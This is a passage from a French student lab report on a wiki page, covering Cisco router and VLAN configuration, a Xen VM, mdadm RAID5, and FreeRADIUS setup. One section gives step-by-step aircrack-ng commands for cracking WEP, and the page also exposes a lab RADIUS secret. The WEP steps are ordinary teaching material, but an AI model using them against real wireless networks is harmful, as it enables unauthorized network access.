 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
